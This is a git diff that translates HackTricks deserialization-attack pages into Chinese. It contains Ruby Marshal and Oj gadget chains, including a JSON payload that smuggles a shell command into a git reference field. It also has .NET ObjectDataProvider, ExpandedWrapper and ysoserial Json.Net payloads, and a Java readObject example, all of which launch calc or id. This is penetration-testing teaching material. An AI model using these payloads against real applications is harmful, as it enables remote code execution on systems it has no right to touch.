+- **对具有风险属性的类型保持谨慎，** 如 `System.ComponentModel.DataAnnotations.ValidationException` 及其 `Value` 属性，可能会被利用。
+- **安全地控制类型实例化，** 以防止攻击者影响反序列化过程，使得即使是 `DataContractSerializer` 或 `XmlSerializer` 也变得脆弱。
+- **使用自定义 `SerializationBinder` 为 `BinaryFormatter` 和 `JSON.Net` 实施白名单控制。**
+- **保持对已知不安全反序列化工具的了解，** 确保反序列化器不实例化此类类型。
+- **将潜在风险代码与具有互联网访问权限的代码隔离，** 以避免将已知工具暴露给不可信的数据源，例如 WPF 应用程序中的 `System.Windows.Data.ObjectDataProvider`。
 
-### **References**
+### **参考文献**
 
-- Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+- Java 和 .Net JSON 反序列化**论文：** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**，** 演讲：[https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) 和幻灯片：[https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
 - [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp)
 - [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
 - [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization)
 
 ## **Ruby**
 
-In Ruby, serialization is facilitated by two methods within the **marshal** library. The first method, known as **dump**, is used to transform an object into a byte stream. This process is referred to as serialization. Conversely, the second method, **load**, is employed to revert a byte stream back into an object, a process known as deserialization.
+在 Ruby 中，序列化通过 **marshal** 库中的两个方法来实现。第一个方法称为 **dump**，用于将对象转换为字节流。这个过程称为序列化。相反，第二个方法 **load** 用于将字节流还原为对象，这个过程称为反序列化。
 
-For securing serialized objects, **Ruby employs HMAC (Hash-Based Message Authentication Code)**, ensuring the integrity and authenticity of the data. The key utilized for this purpose is stored in one of several possible locations:
+为了保护序列化对象，**Ruby 使用 HMAC（基于哈希的消息认证码）**，确保数据的完整性和真实性。用于此目的的密钥存储在几个可能的位置之一：
 
 - `config/environment.rb`
 - `config/initializers/secret_token.rb`
 - `config/secrets.yml`
 - `/proc/self/environ`
 
-**Ruby 2.X generic deserialization to RCE gadget chain (more info in** [**https://www.elttam.com/blog/ruby-deserialization/**](https://www.elttam.com/blog/ruby-deserialization/)**)**:
-
+**Ruby 2.X 通用反序列化到 RCE gadget 链（更多信息见** [**https://www.elttam.com/blog/ruby-deserialization/**](https://www.elttam.com/blog/ruby-deserialization/)**)**：
 ```ruby
 #!/usr/bin/env ruby
 
 # Code from https://www.elttam.com/blog/ruby-deserialization/
 
 class Gem::StubSpecification
-  def initialize; end
+def initialize; end
 end
 
 
@@ -815,7 +764,7 @@ puts
 
 
 class Gem::Source::SpecificFile
-  def initialize; end
+def initialize; end
 end
 
 specific_file = Gem::Source::SpecificFile.new
@@ -837,9 +786,9 @@ puts
 
 
 class Gem::Requirement
-  def marshal_dump
-    [$dependency_list]
-  end
+def marshal_dump
+[$dependency_list]
+end
 end
 
 payload = Marshal.dump(Gem::Requirement.new)
@@ -851,10 +800,10 @@ puts
 
 puts "VALIDATION (in fresh ruby process):"
 IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
-  pipe.print payload
-  pipe.close_write
-  puts pipe.gets
-  puts
+pipe.print payload
+pipe.close_write
+puts pipe.gets
+puts
 end
 
 puts "Payload (hex):"
@@ -866,22 +815,18 @@ require "base64"
 puts "Payload (Base64 encoded):"
 puts Base64.encode64(payload)
 ```
+其他 RCE 链以利用 Ruby On Rails: [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/)
 
-Other RCE chain to exploit Ruby On Rails: [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/)
+### Ruby .send() 方法
 
-### Ruby .send() method
-
-As explained in [**this vulnerability report**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/), if some user unsanitized input reaches the `.send()` method of a ruby object, this method allows to **invoke any other method** of the object with any parameters.
-
-For example, calling eval and then ruby code as second parameter will allow to execute arbitrary code:
+正如在 [**此漏洞报告**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/) 中所解释的，如果某些用户未经过滤的输入到达 ruby 对象的 `.send()` 方法，该方法允许 **调用对象的任何其他方法**，并带有任何参数。
 
+例如，调用 eval 然后将 ruby 代码作为第二个参数将允许执行任意代码:
 ```ruby
 <Object>.send('eval', '<user input with Ruby code>') == RCE
 ```
-
-Moreover, if only one parameter of **`.send()`** is controlled by an attacker, as mentioned in the previous writeup, it's possible to call any method of the object that **doesn't need arguments** or whose arguments have **default values**.\
-For this, it's possible to enumerate all the methods of the object to **find some interesting methods that fulfil those requirements**.
-
+此外，如果只有一个参数被攻击者控制，如前面的写作中提到的，可以调用对象的任何**不需要参数**或其参数具有**默认值**的方法。\
+为此，可以枚举对象的所有方法，以**找到满足这些要求的一些有趣方法**。
 ```ruby
 <Object>.send('<user_input>')
 
@@ -890,40 +835,38 @@ For this, it's possible to enumerate all the methods of the object to **find som
 ## Find methods with those requirements
 repo = Repository.find(1)  # get first repo
 repo_methods = [           # get names of all methods accessible by Repository object
-  repo.public_methods(),
-  repo.private_methods(),
-  repo.protected_methods(),
+repo.public_methods(),
+repo.private_methods(),
+repo.protected_methods(),
 ].flatten()
 
 repo_methods.length()      # Initial number of methods => 5542
 
 ## Filter by the arguments requirements
 candidate_methods = repo_methods.select() do |method_name|
-  [0, -1].include?(repo.method(method_name).arity())
+[0, -1].include?(repo.method(method_name).arity())
 end
 candidate_methods.length() # Final number of methods=> 3595
 ```
+### 其他库
 
-### Other libraries
+此技术取自[ **这篇博客文章**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)。
 
-This technique was taken[ **from this blog post**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared).
+还有其他 Ruby 库可以用来序列化对象，因此可以被滥用以在不安全的反序列化中获得 RCE。以下表格显示了一些这些库及其在反序列化时调用的加载库的方法（基本上是滥用以获得 RCE 的函数）：
 
-There are other Ruby libraries that can be used to serialize objects and therefore that could be abused to gain RCE during an insecure deserialization. The following table shows some of these libraries and the method they called of the loaded library whenever it's unserialized (function to abuse to get RCE basically):
-
-<table data-header-hidden><thead><tr><th width="179"></th><th width="146"></th><th></th></tr></thead><tbody><tr><td><strong>Library</strong></td><td><strong>Input data</strong></td><td><strong>Kick-off method inside class</strong></td></tr><tr><td>Marshal (Ruby)</td><td>Binary</td><td><code>_load</code></td></tr><tr><td>Oj</td><td>JSON</td><td><code>hash</code> (class needs to be put into hash(map) as key)</td></tr><tr><td>Ox</td><td>XML</td><td><code>hash</code> (class needs to be put into hash(map) as key)</td></tr><tr><td>Psych (Ruby)</td><td>YAML</td><td><code>hash</code> (class needs to be put into hash(map) as key)<br><code>init_with</code></td></tr><tr><td>JSON (Ruby)</td><td>JSON</td><td><code>json_create</code> ([see notes regarding json_create at end](#table-vulnerable-sinks))</td></tr></tbody></table>
-
-Basic example:
+<table data-header-hidden><thead><tr><th width="179"></th><th width="146"></th><th></th></tr></thead><tbody><tr><td><strong>库</strong></td><td><strong>输入数据</strong></td><td><strong>类内部启动方法</strong></td></tr><tr><td>Marshal (Ruby)</td><td>二进制</td><td><code>_load</code></td></tr><tr><td>Oj</td><td>JSON</td><td><code>hash</code>（类需要作为键放入 hash(map) 中）</td></tr><tr><td>Ox</td><td>XML</td><td><code>hash</code>（类需要作为键放入 hash(map) 中）</td></tr><tr><td>Psych (Ruby)</td><td>YAML</td><td><code>hash</code>（类需要作为键放入 hash(map) 中）<br><code>init_with</code></td></tr><tr><td>JSON (Ruby)</td><td>JSON</td><td><code>json_create</code>（[请参阅关于 json_create 的说明](#table-vulnerable-sinks)）</td></tr></tbody></table>
 
+基本示例：
 ```ruby
 # Existing Ruby class inside the code of the app
 class SimpleClass
-  def initialize(cmd)
-    @cmd = cmd
-  end
+def initialize(cmd)
+@cmd = cmd
+end
 
-  def hash
-    system(@cmd)
-  end
+def hash
+system(@cmd)
+end
 end
 
 # Exploit
@@ -935,46 +878,40 @@ puts json_payload
 # Sink vulnerable inside the code accepting user input as json_payload
 Oj.load(json_payload)
 ```
-
-In the case of trying to abuse Oj, it was possible to find a gadget class that inside its `hash` function will call `to_s`, which will call spec, which will call fetch_path which was possible to make it fetch a random URL, giving a great detector of these kind of unsanitized deserialization vulnerabilities.
-
+在尝试滥用 Oj 的情况下，可以找到一个小工具类，它在其 `hash` 函数中会调用 `to_s`，而 `to_s` 会调用 spec，进而调用 fetch_path，这使得它能够获取一个随机 URL，从而很好地检测这些未清理的反序列化漏洞。
 ```json
 {
-  "^o": "URI::HTTP",
-  "scheme": "s3",
-  "host": "example.org/anyurl?",
-  "port": "anyport",
-  "path": "/",
-  "user": "anyuser",
-  "password": "anypw"
+"^o": "URI::HTTP",
+"scheme": "s3",
+"host": "example.org/anyurl?",
+"port": "anyport",
+"path": "/",
+"user": "anyuser",
+"password": "anypw"
 }
 ```
-
-Moreover, it was found that with the previous technique a folder is also created in the system, which is a requirement to abuse another gadget in order to transform this into a complete RCE with something like:
-
+此外，发现使用之前的技术在系统中还会创建一个文件夹，这是滥用另一个小工具的要求，以便将其转化为完整的 RCE，类似于：
 ```json
 {
-  "^o": "Gem::Resolver::SpecSpecification",
-  "spec": {
-    "^o": "Gem::Resolver::GitSpecification",
-    "source": {
-      "^o": "Gem::Source::Git",
-      "git": "zip",
-      "reference": "-TmTT=\"$(id>/tmp/anyexec)\"",
-      "root_dir": "/tmp",
-      "repository": "anyrepo",
-      "name": "anyname"
-    },
-    "spec": {
-      "^o": "Gem::Resolver::Specification",
-      "name": "name",
-      "dependencies": []
-    }
-  }
+"^o": "Gem::Resolver::SpecSpecification",
+"spec": {
+"^o": "Gem::Resolver::GitSpecification",
+"source": {
+"^o": "Gem::Source::Git",
+"git": "zip",
+"reference": "-TmTT=\"$(id>/tmp/anyexec)\"",
+"root_dir": "/tmp",
+"repository": "anyrepo",
+"name": "anyname"
+},
+"spec": {
+"^o": "Gem::Resolver::Specification",
+"name": "name",
+"dependencies": []
+}
+}
 }
 ```
-
-Check for more details in the [**original post**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared).
+查看[**原始帖子**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared)以获取更多详细信息。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
index 6048b9e85..23640e903 100644
--- a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
+++ b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -1,70 +1,67 @@
-# Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
+# 基本 .Net 反序列化 (ObjectDataProvider 小工具, ExpandedWrapper 和 Json.Net)
 
 {{#include ../../banners/hacktricks-training.md}}
 
-This post is dedicated to **understand how the gadget ObjectDataProvider is exploited** to obtain RCE and **how** the Serialization libraries **Json.Net and xmlSerializer can be abused** with that gadget.
+这篇文章致力于**理解如何利用 ObjectDataProvider 小工具**来获得 RCE，以及**如何**利用序列化库**Json.Net 和 xmlSerializer**与该小工具进行滥用。
 
-## ObjectDataProvider Gadget
+## ObjectDataProvider 小工具
 
-From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.\
-Yeah, it's a weird explanation, so lets see what does this class have that is so interesting: This class allows to **wrap an arbitrary object**, use _**MethodParameters**_ to **set arbitrary parameters,** and then **use MethodName to call an arbitrary function** of the arbitrary object declared using the arbitrary parameters.\
-Therefore, the arbitrary **object** will **execute** a **function** with **parameters while being deserialized.**
+根据文档：_ObjectDataProvider 类包装并创建一个可以用作绑定源的对象。_\
+是的，这个解释很奇怪，所以让我们看看这个类有什么有趣的地方：这个类允许**包装任意对象**，使用_**MethodParameters**_来**设置任意参数，**然后**使用 MethodName 调用使用任意参数声明的任意对象的任意函数。\
+因此，任意**对象**将在**反序列化**时**执行**一个带有**参数**的**函数**。
 
-### **How is this possible**
+### **这怎么可能**
 
-The **System.Windows.Data** namespace, found within the **PresentationFramework.dll** at `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, is where the ObjectDataProvider is defined and implemented.
+**System.Windows.Data** 命名空间在 `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF` 的 **PresentationFramework.dll** 中定义和实现了 ObjectDataProvider。
 
-Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
+使用 [**dnSpy**](https://github.com/0xd4d/dnSpy) 你可以**检查**我们感兴趣的类的代码。在下面的图像中，我们看到的是 **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> 方法名称** 的代码。
 
 ![](<../../images/image (427).png>)
 
-As you can observe when `MethodName` is set `base.Refresh()` is called, lets take a look to what does it do:
+如你所见，当 `MethodName` 被设置时，调用了 `base.Refresh()`，让我们看看它的作用：
 
 ![](<../../images/image (319).png>)
 
-Ok, lets continue seeing what does `this.BeginQuery()` does. `BeginQuery` is overridden by `ObjectDataProvider` and this is what it does:
+好的，让我们继续看看 `this.BeginQuery()` 的作用。`BeginQuery` 被 `ObjectDataProvider` 重写，以下是它的作用：
 
 ![](<../../images/image (345).png>)
 
-Note that at the end of the code it's calling `this.QueryWorke(null)`. Let's see what does that execute:
+注意在代码的末尾调用了 `this.QueryWorke(null)`。让我们看看它执行了什么：
 
 ![](<../../images/image (596).png>)
 
-Note that this isn't the complete code of the function `QueryWorker` but it shows the interesting part of it: The code **calls `this.InvokeMethodOnInstance(out ex);`** this is the line where the **method set is invoked**.
-
-If you want to check that just setting the _**MethodName**_\*\* it will be executed\*\*, you can run this code:
+注意这不是 `QueryWorker` 函数的完整代码，但它展示了有趣的部分：代码**调用 `this.InvokeMethodOnInstance(out ex);`**，这是**方法集被调用**的那一行。
 
+如果你想检查仅设置_**MethodName**_\*\*就会被执行\*\*，你可以运行以下代码：
 ```java
 using System.Windows.Data;
 using System.Diagnostics;
 
 namespace ODPCustomSerialExample
 {
-    class Program
-    {
-        static void Main(string[] args)
-        {
-            ObjectDataProvider myODP = new ObjectDataProvider();
-            myODP.ObjectType = typeof(Process);
-            myODP.MethodParameters.Add("cmd.exe");
-            myODP.MethodParameters.Add("/c calc.exe");
-            myODP.MethodName = "Start";
-        }
-    }
+class Program
+{
+static void Main(string[] args)
+{
+ObjectDataProvider myODP = new ObjectDataProvider();
+myODP.ObjectType = typeof(Process);
+myODP.MethodParameters.Add("cmd.exe");
+myODP.MethodParameters.Add("/c calc.exe");
+myODP.MethodName = "Start";
+}
+}
 }
 ```
-
-Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ in order to load `System.Windows.Data`
+注意，您需要添加作为引用的 _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ 以加载 `System.Windows.Data`
 
 ## ExpandedWrapper
 
-Using the previous exploit there will be cases where the **object** is going to be **deserialized as** an _**ObjectDataProvider**_ instance (for example in DotNetNuke vuln, using XmlSerializer, the object was deserialized using `GetType`). Then, will have **no knowledge of the object type that is wrapped** in the _ObjectDataProvider_ instance (`Process` for example). You can find more [information about the DotNetNuke vuln here](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
+使用之前的漏洞，将会有一些情况，其中 **对象** 将被 **反序列化为** 一个 _**ObjectDataProvider**_ 实例（例如在 DotNetNuke 漏洞中，使用 XmlSerializer，对象是通过 `GetType` 反序列化的）。然后，将对 _ObjectDataProvider_ 实例中所包装的 **对象类型没有任何了解**（例如 `Process`）。您可以在这里找到更多关于 DotNetNuke 漏洞的 [信息](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1)。
 
-This class allows to s**pecify the object types of the objects that are encapsulated** in a given instance. So, this class can be used to encapsulate a source object (_ObjectDataProvider_) into a new object type and provide the properties we need (_ObjectDataProvider.MethodName_ and _ObjectDataProvider.MethodParameters_).\
-This is very useful for cases as the one presented before, because we will be able to **wrap \_ObjectDataProvider**_\*\* inside an \*\*_**ExpandedWrapper** \_ instance and **when deserialized** this class will **create** the _**OjectDataProvider**_ object that will **execute** the **function** indicated in _**MethodName**_.
-
-You can check this wrapper with the following code:
+这个类允许 **指定封装在给定实例中的对象的类型**。因此，这个类可以用来将源对象 (_ObjectDataProvider_) 封装到一个新的对象类型中，并提供我们需要的属性 (_ObjectDataProvider.MethodName_ 和 _ObjectDataProvider.MethodParameters_)。\
+这对于之前提出的情况非常有用，因为我们将能够 **将 \_ObjectDataProvider**_\*\* 包装在一个 \*\*_**ExpandedWrapper** \_ 实例中，并且 **在反序列化时** 这个类将 **创建** _**OjectDataProvider**_ 对象，该对象将 **执行** 在 _**MethodName**_ 中指示的 **函数**。
 
+您可以使用以下代码检查这个包装器：
 ```java
 using System.Windows.Data;
 using System.Diagnostics;
@@ -72,29 +69,27 @@ using System.Data.Services.Internal;
 
 namespace ODPCustomSerialExample
 {
-    class Program
-    {
-        static void Main(string[] args)
-        {
-            ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
-            myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
-            myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
-            myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
-            myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
-            myExpWrap.ProjectedProperty0.MethodName = "Start";
-        }
-    }
+class Program
+{
+static void Main(string[] args)
+{
+ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
+myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
+myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
+myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
+myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
+myExpWrap.ProjectedProperty0.MethodName = "Start";
+}
+}
 }
 ```
-
 ## Json.Net
 
-In the [official web page](https://www.newtonsoft.com/json) it is indicated that this library allows to **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. So, if we could **deserialize the ObjectDataProvider gadget**, we could cause a **RCE** just deserializing an object.
+在[官方网站](https://www.newtonsoft.com/json)上指出，这个库允许**使用Json.NET强大的JSON序列化器序列化和反序列化任何.NET对象**。因此，如果我们能够**反序列化ObjectDataProvider小工具**，我们可以仅通过反序列化一个对象来导致**RCE**。
 
-### Json.Net example
-
-First of all lets see an example on how to **serialize/deserialize** an object using this library:
+### Json.Net示例
 
+首先，让我们看一个如何使用这个库**序列化/反序列化**对象的示例：
 ```java
 using System;
 using Newtonsoft.Json;
@@ -103,60 +98,56 @@ using System.Collections.Generic;
 
 namespace DeserializationTests
 {
-    public class Account
-    {
-        public string Email { get; set; }
-        public bool Active { get; set; }
-        public DateTime CreatedDate { get; set; }
-        public IList<string> Roles { get; set; }
-    }
-    class Program
-    {
-        static void Main(string[] args)
-        {
-            Account account = new Account
-            {
-                Email = "james@example.com",
-                Active = true,
-                CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
-                Roles = new List<string>
-                {
-                    "User",
-                    "Admin"
-                }
-            };
-            //Serialize the object and print it
-            string json = JsonConvert.SerializeObject(account);
-            Console.WriteLine(json);
-            //{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}
+public class Account
+{
+public string Email { get; set; }
+public bool Active { get; set; }
+public DateTime CreatedDate { get; set; }
+public IList<string> Roles { get; set; }
+}
+class Program
+{
+static void Main(string[] args)
+{
+Account account = new Account
+{
+Email = "james@example.com",
+Active = true,
+CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
+Roles = new List<string>
+{
+"User",
+"Admin"
+}
+};
+//Serialize the object and print it
+string json = JsonConvert.SerializeObject(account);
+Console.WriteLine(json);
+//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}
 
-            //Deserialize it
-            Account desaccount = JsonConvert.DeserializeObject<Account>(json);
-            Console.WriteLine(desaccount.Email);
-        }
-    }
+//Deserialize it
+Account desaccount = JsonConvert.DeserializeObject<Account>(json);
+Console.WriteLine(desaccount.Email);
+}
+}
 }
 ```
+### 滥用 Json.Net
 
-### Abusing Json.Net
-
-Using [ysoserial.net](https://github.com/pwntester/ysoserial.net) I crated the exploit:
-
+使用 [ysoserial.net](https://github.com/pwntester/ysoserial.net) 我创建了这个漏洞：
 ```java
 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
 {
-    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
-    'MethodName':'Start',
-    'MethodParameters':{
-        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
-        '$values':['cmd', '/c calc.exe']
-    },
-    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
+'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
+'MethodName':'Start',
+'MethodParameters':{
+'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
+'$values':['cmd', '/c calc.exe']
+},
+'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
 }
 ```
-
-In this code you can **test the exploit**, just run it and you will see that a calc is executed:
-
+在这段代码中，你可以**测试漏洞**，只需运行它，你将看到一个计算器被执行：
 ```java
 using System;
 using System.Text;
@@ -164,35 +155,33 @@ using Newtonsoft.Json;
 
 namespace DeserializationTests
 {
-    class Program
-    {
-        static void Main(string[] args)
-        {
-            //Declare exploit
-            string userdata = @"{
-                '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
-                'MethodName':'Start',
-                'MethodParameters':{
-                            '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
-                    '$values':['cmd', '/c calc.exe']
-                },
-                'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
-            }";
-            //Exploit to base64
-            string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));
+class Program
+{
+static void Main(string[] args)
+{
+//Declare exploit
+string userdata = @"{
+'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
+'MethodName':'Start',
+'MethodParameters':{
+'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
+'$values':['cmd', '/c calc.exe']
+},
+'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
+}";
+//Exploit to base64
+string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));
 
-            //Get data from base64
-            byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
-            //Deserialize data
-            string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
-            object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
-            {
-                TypeNameHandling = TypeNameHandling.Auto
-            });
-        }
-    }
+//Get data from base64
+byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
+//Deserialize data
+string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
+object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
+{
+TypeNameHandling = TypeNameHandling.Auto
+});
+}
+}
 }
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
index c86946b86..3c840e3de 100644
--- a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
+++ b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
@@ -1,90 +1,87 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-In this POST it's going to be explained an example using `java.io.Serializable`.
+在这篇文章中，将解释一个使用 `java.io.Serializable` 的示例。
 
 # Serializable
 
-The Java `Serializable` interface (`java.io.Serializable` is a marker interface your classes must implement if they are to be **serialized** and **deserialized**. Java object serialization (writing) is done with the [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) and deserialization (reading) is done with the [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html).
+Java `Serializable` 接口（`java.io.Serializable` 是一个标记接口，您的类必须实现它才能被 **序列化** 和 **反序列化**。Java 对象序列化（写入）是通过 [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html) 完成的，反序列化（读取）是通过 [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html) 完成的。
 
-Lets see an example with a **class Person** which is **serializable**. This class **overwrites the readObject** function, so when **any object** of this **class** is **deserialized** this **function** is going to be **executed**.\
-In the example, the **readObject function** of the class Person calls the function `eat()` of his pet and the function `eat()` of a Dog (for some reason) calls a **calc.exe**. **We are going to see how to serialize and deserialize a Person object to execute this calculator:**
-
-**The following example is from [https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649](https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649)**
+让我们看一个 **可序列化的类 Person** 的示例。这个类 **重写了 readObject** 函数，因此当 **这个类的任何对象** 被 **反序列化** 时，这个 **函数** 将被 **执行**。\
+在这个示例中，Person 类的 **readObject 函数** 调用了它的宠物的 `eat()` 函数，而 Dog 的 `eat()` 函数（出于某种原因）调用了 **calc.exe**。 **我们将看到如何序列化和反序列化一个 Person 对象以执行这个计算器：**
 
+**以下示例来自 [https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649](https://medium.com/@knownsec404team/java-deserialization-tool-gadgetinspector-first-glimpse-74e99e493649)**
 ```java
 import java.io.Serializable;
 import java.io.*;
 
 public class TestDeserialization {
-    interface Animal {
-        public void eat();
-    }
-    //Class must implements Serializable to be serializable
-    public static class Cat implements Animal,Serializable {
-        @Override
-        public void eat() {
-            System.out.println("cat eat fish");
-        }
-    }
-    //Class must implements Serializable to be serializable
-    public static class Dog implements Animal,Serializable {
-        @Override
-        public void eat() {
-            try {
-                Runtime.getRuntime().exec("calc");
-            } catch (IOException e) {
-                e.printStackTrace();
-            }
-            System.out.println("dog eat bone");
-        }
-    }
-    //Class must implements Serializable to be serializable
-    public static class Person implements Serializable {
-        private Animal pet;
-        public Person(Animal pet){
-            this.pet = pet;
-        }
-        //readObject implementation, will call the readObject from ObjectInputStream  and then call pet.eat()
-        private void readObject(java.io.ObjectInputStream stream)
-                throws IOException, ClassNotFoundException {
-            pet = (Animal) stream.readObject();
-            pet.eat();
-        }
-    }
-    public static void GeneratePayload(Object instance, String file)
-            throws Exception {
